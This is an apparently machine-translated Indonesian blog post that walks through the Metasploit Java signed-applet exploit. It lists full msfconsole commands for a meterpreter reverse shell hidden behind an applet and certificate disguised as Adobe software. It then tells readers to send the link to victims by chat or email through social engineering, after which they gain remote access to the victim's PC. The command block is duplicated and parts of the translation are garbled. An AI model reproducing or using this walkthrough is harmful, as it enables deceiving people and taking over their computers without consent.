Mengeksploitasi ini secara dinamis menciptakan sebuah file jar. Melalui Msf :: Exploit :: Jawa mixin, kemudian tanda-tanda itu. dihasilkan applet ditandatangani disajikan kepada korban melalui halaman web dengan tag applet.
Korban JVM akan muncul dialog yang menanyakan apakah mereka mempercayai applet ditandatangani. Pada versi dialog akan menampilkan nilai CERTCN dalam "Penerbit" line. Baru JVMs display "UNKNOWN" ketika tanda tangan tidak dipercaya (yaitu, itu tidak ditandatangani oleh CA yang dipercaya). Ini SigningCert pilihan memungkinkan Anda untuk memberikan kode terpercaya penandatanganan cert, nilai-nilai yang akan menimpa CERTCN.
Jika SigningCert tidak diberikan, yang secara acak diri menandatangani sertifikat akan digunakan. Either way, setelah pengguna mengklik "run", applet dijalankan dengan hak akses pengguna penuh.
Buka backtrack terminal tipe msfconsole
use exploit/multi/browser/java_signed_applet press enter
Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp
Msf exploit (Java_signed-applet)>Set appletname adobe (applet utama adalah nama kelas)
Msf exploit (Java_signed-applet)>Set certcn adobe player (nilai untuk sertifikat)
Msf exploit (Java_signed-applet)>Set srvhost 192.168.1.4 (Ini harus menjadi alamat pada komputer lokal)
Msf exploit (Java_signed-applet)>Set srvport 80 (Port lokal kita gunakan standar/defaulth: 8080)
Msf exploit (Java_signed-applet)>Set uripath adobevideos (Url Ini digunakan untuk mengeksploitasi)
Msf exploit (Java_signed-applet)>Set lport 443
Msf exploit (Java_signed-applet)>exploit
Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp
Msf exploit (Java_signed-applet)>Set appletname adobe (applet utama adalah nama kelas)
Msf exploit (Java_signed-applet)>Set certcn adobe player (nilai untuk sertifikat)
Msf exploit (Java_signed-applet)>Set srvhost 192.168.1.4 (Ini harus menjadi alamat pada komputer lokal)
Msf exploit (Java_signed-applet)>Set srvport 80 (Port lokal kita gunakan standar/defaulth: 8080)
Msf exploit (Java_signed-applet)>Set uripath adobevideos (Url Ini digunakan untuk mengeksploitasi)
Msf exploit (Java_signed-applet)>Set lport 443
Msf exploit (Java_signed-applet)>exploit
Sekarang URL Anda harus memberikan kepada korban Anda : 192.168.1.4/adobevideos
Kirim link server ke korban melalui chatting atau email atau teknik rekayasa sosial.
Ketika korban membuka link yang di browser mereka, segera akan memberitahukan kotak dialog tentang tanda tangan digital tidak dapat diverifikasi seperti gambar di bawah ini.
Ketika korban membuka link yang di browser mereka, segera akan memberitahukan kotak dialog tentang tanda tangan digital tidak dapat diverifikasi seperti gambar di bawah ini.
Anda sekarang memiliki akses ke PC korban. Gunakan "Sesi-l" dan nomor Sesi untuk menghubungkan ke sesi. Dan Sekarang Ketik "sesi-i ID"
S0urces : Backtrack Linux
0komentar:
Post a Comment